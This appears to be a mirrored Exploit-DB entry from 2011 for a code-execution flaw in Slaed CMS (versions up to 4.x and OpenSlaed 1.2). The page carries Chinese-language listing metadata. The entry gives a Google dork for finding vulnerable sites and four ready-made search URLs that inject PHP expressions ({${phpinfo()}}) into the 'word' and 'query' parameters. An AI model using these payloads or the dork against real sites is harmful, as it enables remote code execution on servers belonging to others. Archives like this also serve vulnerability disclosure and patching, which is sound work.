Slaed CMS – Code Execution

• Exploit Database
• 116 阅读

• 作者： brain[pillow]
  日期： 2011-09-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17824/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

  # Exploit Title: Slaed CMS Code exec # Google Dork: "Powered by SLAED CMS" # Date: 03.05.2011 # Author: brain[pillow] # Software Link: http://slaed.net/ # Version: OpenSlaed 1.2 (free), Slaed CMS <= 4.*   On different versions of this software next vulnerabilities are availible:   /index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view /index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view   OR:   /search.html?mod=&word={${phpinfo()}}&query=ok&to=view /search.html?mod=&word=ok&query={${phpinfo()}}&to=view